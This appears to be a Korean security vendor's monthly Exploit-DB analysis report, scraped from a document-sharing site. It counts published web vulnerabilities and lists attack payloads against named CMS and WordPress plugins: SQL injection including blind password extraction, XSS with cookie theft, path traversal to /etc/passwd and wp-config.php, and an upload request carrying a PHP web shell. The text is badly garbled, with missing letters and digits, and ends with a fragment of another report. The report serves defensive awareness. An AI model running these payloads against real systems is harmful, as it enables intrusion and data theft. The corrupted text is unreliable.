EDB 분석보고서 (05.0) ~ Exploit-DB( 에공개된별로분류한정보입니다 SQL Injection 하 상 u5cms localize.php SQL U5cms 3607 SQL

Size: px

Start display at page:

Download "EDB 분석보고서 (05.0) ~ Exploit-DB( 에공개된별로분류한정보입니다 SQL Injection 하 상 u5cms localize.php SQL U5cms 3607 SQL"

동완 십
5 years ago
Views:

1 EDB 분석보고서 (05.0) ~ Exploit-DB( 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 05 년 월에공개된 Exploit-DB 의분석결과, 지난 월의분석결과와동일하게 SQL Injection 과 Coss Site Scipting(XSS) 공격에대한보고개수가가장많았습니다. 이번 월은최근 6 개월간의보고중가장많은이보고된기간인것과더불어위험도가매우높은들이다수분포되어있다는특징을지닙니다. 약 60% 에달하는이매우낮은난이도의공격으로분석된반면, 약 65% 에달하는이위험도가매우높은것으로확인되고있어, 가장많은개수가보고된 SQL Injection 과 Coss Site Scipting(XSS) 공격에대해특별히주의가요구됩니다. 한편, 주요소프트웨어발생현황을보면 Open Souce CMS 인 u5cms 와웹기반의 PHP Toubleshooting Tool 인 PHPBugTacke 가가장많은이보고되었고종류도다양하게발견되었습니다. 금월에새로보고된 u5cms 는작고가벼운사이트를만들기위해적합한 CMS 로써자신의사이트가해당 CMS 를사용하고있다면보안패치를실시하여에노출되지않도록대비해야겠습니다.. 별보고개수 보고개수 SQL Injection 3 XSS 4 LFI 6 File Upload 총합계 별보고개수 SQL Injection XSS LFI File Upload 총합계. 위험도별분류 위험도 보고개수 백분율 상 % 중 35.48% 하 % 합계 % 위험도별분류 상 40 중 3. 공격난이도별현황공격난이도 보고개수 백분율 상.6% 중 % 하 % 총합계 % 37 공격난이도별현황 4 상 중 하 4. 주요소프트웨어별발생현황소프트웨어이름 u5cms Wodpess Seve Zeuscat Piwigo WeBid Sefengo Redaxscipt Pagyan Pandoa IBM Endpoint Manage Fok Exponent Clipbucket Chamilo BeehiveFoum 총합계 보고개수 주요소프트웨어별발생현황 u5cms Wodpess Seve Zeuscat Piwigo WeBid Sefengo Redaxscipt Pagyan Pandoa IBM Endpoint Manage Fok ** 5개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 3609 XSS 하 중 u5cms index.php XSS U5cms 3609 XSS 하 중 u5cms copy.php XSS U5cms 3609 XSS 하 중 u5cms delete.php XSS U5cms 3609 XSS 하 중 u5cms done.php XSS U5cms 3609 XSS 하 중 u5cms edito.php XSS U5cms 3609 XSS 하 중 u5cms notdone.php XSS U5cms 3609 XSS 하 중 u5cms sendfile.php XSS U5cms 3609 XSS 하 중 u5cms chaactes.php XSS U5cms 3608 LFI 하 중 u5cms thumb.php LFI U5cms 3607 SQL Injection 하 상 u5cms copy.php SQL U5cms

2 EDB 분석보고서 (05.0) ~ Exploit-DB( 에공개된별로분류한정보입니다 SQL Injection 하 상 u5cms localize.php SQL U5cms 3607 SQL Injection 하 상 u5cms meta.php SQL U5cms 3607 SQL Injection 하 상 u5cms metai.php SQL U5cms 3607 SQL Injection 하 상 u5cms nc.php SQL U5cms 3607 SQL Injection 하 상 u5cms new.php SQL U5cms 3607 SQL Injection 하 상 u5cms ename.php SQL U5cms 3606 LFI 하 상 u5cms deletefile.php LFI U5cms 3660 SQL Injection 중 상 poject.php SQL 3660 XSS 하 중 poject.php XSS 3660 XSS 중 중 use.php XSS 3660 XSS 중 중 goup.php XSS 3660 SQL Injection 중 중 goup.php SQL 3660 SQL Injection 중 상 status.php SQL 3660 XSS 중 상 status.php XSS 3660 SQL Injection 중 상 esolution.php SQL 3660 SQL Injection 중 상 seveity.php SQL 3660 XSS 중 상 seveity.php XSS 3660 SQL Injection 중 상 pioity.php SQL 3660 SQL Injection 중 상 os.php SQL I 3660 XSS 중 상 os.php XSS 3660 SQL Injection 중 상 database.php SQL 3660 XSS 중 상 database.php XSS 3660 SQL Injection 중 상 site.php SQL 3660 SQL Injection 중 상 bug.php SQL LFI 하 상 Wodpess Theme Divi Abitay - admin-ajax.php Local File Inclusion Vulneability Wodpess SQL Injection 중 상 Wodpess Suvey and poll - SQL Wodpess SQL Injection 하 상 Wodpess Video Galley SQL Wodpess 3606 SQL Injection 상 상 WodPess Webdoado Spide Event Calenda admin-ajax.php SQL Wodpess SQL Injection 중 상 WondePlugin Audio Playe.0 - admin-ajax.php SQL Wodpess XSS 하 상 WondePlugin Audio Playe.0 - admin-ajax.php XSS Wodpess XSS 하 상 WodPess Fancybox fancybox.php XSS Wodpess

3 EDB 분석보고서 (05.0) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 SQL Injection 하상 Sefengo CMS.6. - main.php SQL POST /sefengo/backend/main.php HTTP/. eseach-itasvn.hcloud.com Use-Agent: Mozilla/5.0 (Windows NT 6.; WOW64; v:35.0) Gecko/0000 Fiefox/35.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/ *;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: bowsespy_js=; sefengo=867bb0746d09b06b879f Connection: keep-alive Content-Type: application/x-www-fom-ulencoded Content-Length: Sefengo Sefengo CMS.6. value_to_save=45&sefengo=867bb0746d09b06b8 79f786356&aea=settings&action=save_value&value_id= 3 and = SQL Injection 하 상 LFI 하 중 XSS 하 중 XSS 하 중 Pagyan CMS SQL Injection Seve MAGMI Plugin - ajax_pluginconf.php LFI Seve MAGMI Plugin - magmi.php XSS Seve MAGMI Plugin - magmi_impot_un.php XSS /use:%7+and+=+union+select+database%8%9,v esion%8%9,3+--+ /magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=customs QLUtility /magmi/web/magmi.php?configstep=&pofile=</scipt><s /magmi/web/magmi_impot_un.php?</scipt><scipt>ale t('xss');</scipt> Pagyan Seve Seve Seve Pagyan CMS 3.0 Seve MAGMI Plugin Seve MAGMI Plugin Seve MAGMI Plugin LFI 하상 Wodpess Theme Divi Abitay - admin-ajax.php Local File Inclusion Vulneability /wp-admin/adminajax.php?action=evslide_show_image&img=../wpconfig.php Wodpess Wodpess Theme Divi Abitay LFI 하중 XSS 하중 - fotogaleie.php Local File Inclusion /path/fotogaleie.php?id=../../../../../../../../../../etc/passwd %00 u5cms index.php XSS 취 /u5cms/index.php?c=stat"><scipt>alet()</scipt>&l=e& 약점 p=&= XSS 하중 u5cms copy.php XSS /u5cms/u5admin/copy.php?name=album"><img%0sc% 3da%0oneo%3dalet(7)> XSS 하중 u5cms delete.php XSS /u5cms/u5admin/delete.php?name=a"><img%0sc%3da %0oneo%3dalet(8)> XSS 하중 u5cms done.php XSS /u5cms/u5admin/done.php?n=inseted%0test"><scipt> alet()</scipt> XSS 하 중 XSS 하 중 XSS 하 중 XSS 하 중 LFI 하 중 u5cms edito.php XSS /u5cms/u5admin/edito.php?c=c"><scipt>alet()</scipt > u5cms notdone.php /u5cms/u5admin/notdone.php?n=wong%0name,%0n XSS ot%0deleted%0<scipt>alet(4)</scipt> u5cms sendfile.php XSS /u5cms/u5admin/sendfile.php?name=shotefeence&l=_f d"><scipt>alet(6)</scipt>&typ=d u5cms chaactes.php /u5cms/u5admin/chaactes.php?moe=335&s=335"><sci XSS pt>alet(7)</scipt> u5cms thumb.php LFI 취 /u5cms/thumb.php?w=00&f=../../../../../../../../../../etc/p 약점 asswd% SQL Injection 하상 u5cms copy.php SQL POST /u5cms/u5admin/copy.php?name=album HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr Use-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Tident/6.0) Content-Type:application/x-www-fom-ulencoded name=album' and ''=' SQL Injection 하 상 SQL Injection 하 상 SQL Injection 하 상 SQL Injection 하 상 u5cms localize.php SQL u5cms meta.php SQL u5cms metai.php SQL u5cms nc.php SQL /u5cms/u5admin/edito.php?c=stat' and ''=' /u5cms/u5admin/localize.php?name=album' and ''=' /u5cms/u5admin/metai.php?typ=a&name=album' and '' = ' /u5cms/u5admin/nc.php?name=o' and ''=' SQL Injection 하상 u5cms new.php SQL POST /u5cms/u5admin/new.php?name=album HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr Use-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Tident/6.0) Content-Type: application/x-www-fom-ulencoded name=test' and ''=' "&typ=e SQL Injection 하상 LFI 하상 u5cms ename.php SQL u5cms deletefile.php LFI GET /u5cms/u5admin/ename.php?name=valbum&newname =valbum' and ''='&typ=a /u5cms/u5admin/deletefile.php?typ=d&name=shotefee nce&f=../../../../../../deleteme.txt

4 EDB 분석보고서 (05.0) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 SQL Injection 하상 Redaxscipt CMS..0 - seach.php SQL POST /edaxscipt/ HTTP/. taget.local Use-Agent: Mozilla/5.0 (Windows NT 6.; WOW64; v:34.0) Gecko/0000 Fiefox/34.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/ *;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=khtnnmtvvk3sif0no36787; GEAR=local-54433b500446ead5000d4 Connection: keep-alive Content-Type: application/x-www-fom-ulencoded Content-Length: 96 Redaxscipt Redaxscipt CMS..0 seach_tems=test' o ''='&seach_post=&token=4bcb85bc6f5c9303e4f95 d9f00833faf94&seach_post=seach SQL Injection 하상 Fok CMS fom SQL /pivate/en/locale/index?fom=filte&fom_token=68aa8d 73e0bd95a70e d5&application=&module= &type[]=act'+(select * fom (select(sleep(0)))a)+'&type[]=e&type[]=lbl&type[]=msg &language[]=en&name=&value= Fok Fok CMS SQL Injection 중상 Chamilo LMS m_categoy.php SQL Injection /chamiloul/main/esevation/m_categoy.php?action=delete&id=0 UNION (SELECT IF(subst(passwod,,) = CHAR(00), SLEEP(5), 0) FROM use WHERE use_id = ) Chamilo Chamilo LMS XSS 하중 IBM Endpoint Manage - XSS /cgi-bin/bfentepise/besgathemionew.exe/- gathevesion?body=gathespecifiedvesion&vesion=&u l= C=0 IBM Endpoint Manage IBM Endpoint Manage 9..x vesions ealie than 9..9 또는 9..x vesions ealie than SQL Injection 하상 Pandoa FMS 5. SP - index.php SQL /pandoa/index.php?extension_in_menu=estado&sec=ext ensions&sec=extensions/agents_modules&ef=&offset=- ' and ''=''-- Pandoa Pandoa FMS 5. SP SQL Injection 중상 Wodpess Suvey and poll - SQL /wp-admin/adminajax.php?action=ajax_suvey&sspcmd=save&suvey_id= AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x0)),3,))>75 Wodpess Wodpess Suvey and poll SQL Injection 하상 Wodpess Video Galley SQL /wp-admin/adminajax.php%3faction=ss&type=video&vid=%0and%0 = Wodpess Wodpess Video Galley XSS 하상 Exponent CMS.3. - XSS /news/show/title/"><scipt>alet(7)</scipt>time-fo-a-heavy Exponent Exponent CMS SQL Injection 상상 WodPess Webdoado Spide Event Calenda adminajax.php SQL /wp-admin/adminajax.php?action=spidebigcalenda_month&theme_id=3 &calenda=&select=month,list,week,day,&date=05-0&many_sp_calenda=&cu_page_ul=%s&cat_id=)% %0UNION%%0SELECT%%0%s,,%%0FROM_UNI XTIME( ),,(SELECT%%0CONCAT(CHAR(35, 35,35,35),table_name,CHAR(35,35,35,35))%%0FROM %%0infomation_schema.tables%%0WHERE%%0ta ble_name%%0like%%0(%%0select%%0char( 37,%%07,%%05,%%00,%%04,%%0 5)%%0)%%0LIMIT%%0),,,,,%%0CHAR( 0,%%0,%%095,%%04,%%00,%%0,%%00,%%097,%%06),,,,,,,,,% %0FROM%%0DUAL;--%%0--%%0&widget=0') Wodpess WodPess Webdoado Spide Event Calenda SQL Injection 중상 WondePlugin Audio Playe.0 - admin-ajax.php SQL Injection POST /wp-admin/adminajax.php?action=wondeplugin_audio_save_item HTTP/. Use-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chome/ Safai/535.7 Content-Type: application/x-www-fom-ulencoded chaset=utf-8 Wodpess Wodpess WondePlugin Audio Playe.0 item[id]= UNION (SELECT,, 3, 4, IF(subst(use_pass,,) = CHAR(36), SLEEP(5), 0) FROM `wp_uses` WHERE ID = )

5 EDB 분석보고서 (05.0) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 XSS 하상 WondePlugin Audio Playe.0 - admin-ajax.php XSS POST /wp-admin/adminajax.php?action=wondeplugin_audio_save_item HTTP/. Use-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chome/ Safai/535.7 Content-Type: application/x-www-fom-ulencoded; chaset=utf-8 Wodpess Wodpess WondePlugin Audio Playe.0 item[id]=<scipt>alet(sting.fomchacode(88,83,83));</s cipt>&item[customcss]=</style><scipt>alet(sting.fomc hacode(88,83,83));</scipt> SQL Injection 중 상 LFI 하 중 v SQL v expot.jsp LFI /cm/blogss/feed?entity=mostviewedpost&analyticstype=b log&catid=-) AND 64=BENCHMARK( ,MD5(0x73764b7a)) AND (398=398&count=0&et_cw=850&et_ch=600 /cm/newui/blog/expot.jsp?filepath=../conf/catalina/local host/cm.xml&stat=tue&et_cw=350&et_ch=00 v v XSS 하상 WodPess Fancybox fancybox.php XSS POST /wp-admin/admin-ajax.php HTTP/. Use-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chome/ Safai/535.7 Content-Type: application/x-www-fom-ulencoded; chaset=utf-8 WodPess WodPess Fancybox XSS 중상 Piwigo admin.php XSS action=update&mfbfw[padding]=</scipt><scipt>alet('xs s')</scipt> /admin.php?page=plugin-admintools<img sc=n oneo=eval(sting.fomchacode(97,08,0,4,6,4 0,00,,99,7,09,0,0,6,46,99,,,07, 05,0,4,59)) > Piwigo Piwigo SQL Injection 중상 Piwigo admin.php SQL POST /piwigo/admin.php?page=histoy HTTP/. localhost Use-Agent: Mozilla/5.0 (X; Linux x86_64; v:3.0) Gecko/0000 Fiefox/3.0 Iceweasel/3.3.0 Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: pwg_display_thumbnail=no_display_thumbnail; Content-Type: application/x-www-fom-ulencoded Content-Length: 55 Piwigo Piwigo.7.3 stat= &end= &types[]=none&types[]=pictue&types[]=high&types[]=oth e&use=) AND = UNION SELECT use(),database(),3,vesion(),5,6,7,8, XSS 하중 Beehive Foum edit_efs.php XSS POST /edit_pefs.php HTTP/. Use-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chome/ Safai/535.7 Content-Type: application/x-www-fom-ulencoded; chaset=utf-8 webtag=default&nickname=test& =test&fistname= test&lastname=test&dob_day=3&dob_month=3&dob_yea =989&homepage_ul=<scipt>alet();</scipt>&homepa ge_ul_global=y&pic_ul=<scipt>alet();</scipt>&pic_ul _global=y&avata_ul=<scipt>alet();</scipt>&avata_ul _global=y&save=save BeehiveFoum BeehiveFoum File Upload 하상 WeBid.. - ajax.php File Upload POST /ajax.php?do=uploadaucimages HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr Use-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Tident/6.0) Content-Type: multipat/fom-data; bounday= dd009908f WeBid WeBid dd009908f Content-Disposition: fom-data; name="filedata"; filename="shell.php" Content-Type: application/octet-steam <?php eo_epoting(0); pint( ); passthu(base64_decode(\$_server[http_cmd]));?> dd009908f SQL Injection 하중 XSS 중중 Clipbucket.7 RC view_item.php SQL Zeuscat v.4 - index.php XSS /clipbucket/view_item.php?item=a%7%0o%0%7a %7=%7a&type=photos&collection=9 /index.php?do=seach&seach=%%3e%3cbody%0o nload=eval%8alet%8document.cookie%9%9%0 %3E%3C!-- Clipbucket Clipbucket.7 RC3 0.9 Zeuscat Zeuscat v.4

6 EDB 분석보고서 (05.0) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 SQL Injection 중상 SQL Injection 중상 XSS 하중 Zeuscat v.4 - /admin SQL poject.php SQL poject.php XSS /admin/?do=dispodes&action=detail&id=+and+=+un ion+select+,,3,4,5,6,7,8,9,0,,,3,4,5,6,7,8, 9,0,,,3,4,5,6,7,8,9,30,3,3,database% 8%9,34,35,vesion%8%9,37, /admin/poject.php?op=edit_component&id=%7+and+ =+union+select+,,database%8%9,use%8%9, 5,6,vesion%8%9,8,9,0,,+--+ POST /admin/poject.php?op=add HTTP/. Use-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chome/ Safai/535.7 Content-Type: application/x-www-fom-ulencoded; chaset=utf-8 Zeuscat Zeuscat v poject_name=<scipt>alet();</scipt> XSS 중중 XSS 중중 use.php XSS goup.php XSS /admin/use.php?op=edit&use_js=%%3e%3cscipt% 3Ealet%8document.cookie%9%3C/scipt%3E&use_i d= /admin/goup.php?op=edit&use_js=%%3e%3cscipt %3Ealet%8document.cookie%9%3C/scipt%3E&go up_id= SQL Injection 중중 goup.php SQL /admin/goup.php?op=edit&use_js=&goup_id=+and+s LEEP%80% SQL Injection 중상 status.php SQL /admin/status.php?op=edit&status_id=%7+and+=+u nion+select+,use%8%9,database%8%9,vesion% 8%9, XSS 중상 status.php XSS POST /admin/status.php?op=edit&use_js=&status_id=0 HTTP/. Use-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chome/ Safai/535.7 Content-Type: application/x-www-fom-ulencoded; chaset=utf Desciption=<scipt>alet();</scipt> SQL Injection 중 상 SQL Injection 중 상 esolution.php SQL seveity.php SQL /admin/esolution.php?op=edit&esolution_id=%7+and +=+union+select+,use%8%9,database%8%9,v esion%8%9 /admin/seveity.php?op=edit&seveity_id=%7+and+= +union+select+,use%8%9,database%8%9,vesi on%8%9, XSS 중상 seveity.php XSS POST /admin/seveity.php?op=edit&use_js=&seveity_id=0 HTTP/. Use-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chome/ Safai/535.7 Content-Type: application/x-www-fom-ulencoded; chaset=utf Desciption=<scipt>alet();</scipt> SQL Injection 중 상 SQL Injection 중 상 pioity.php SQL os.php SQL /admin/pioity.php?op=edit&pioity_id=%7+and+= +union+select+,use%8%9,database%8%9,4,vesi on%8%9+--+ /admin/os.php?op=edit&os_id=%7+and+=+union+s elect+,use%8%9,database%8%9,vesion%8% XSS 중상 os.php XSS POST /admin/os.php?op=edit&use_js=&os_id=0 HTTP/. Use-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chome/ Safai/535.7 Content-Type: application/x-www-fom-ulencoded; chaset=utf Regex=<scipt>alet();</scipt> SQL Injection 중상 database.php SQL /admin/database.php?op=edit&database_id=%7+and+ =+union+select+,use%8%9,vesion%8% XSS 중상 database.php XSS POST /admin/database.php?op=edit&use_js=&database_id=0 HTTP/. Use-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chome/ Safai/535.7 Content-Type: application/x-www-fom-ulencoded; chaset=utf Name=<scipt>alet();</scipt> SQL Injection 중상 SQL Injection 중상 site.php SQL bug.php SQL /admin/site.php?op=edit&site_id=5%7+and+=+union +select+,vesion%8%9,database%8%9 /bug.php?op=add&poject=%7+and+=+union+selec t+use%8%

EDB 분석보고서 (04.06) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time-

EDB 분석보고서 (04.06) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time- EDB 분석보고서 (04.06) 04.06.0~04.06.0 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 04년 06월에공개된 Exploit-DB의분석결과, SQL 공격에대한보고개수가가장많았습니다. 이와같은결과로부터여전히 SQL 이웹에서가장많이사용되는임을확인할수있습니다.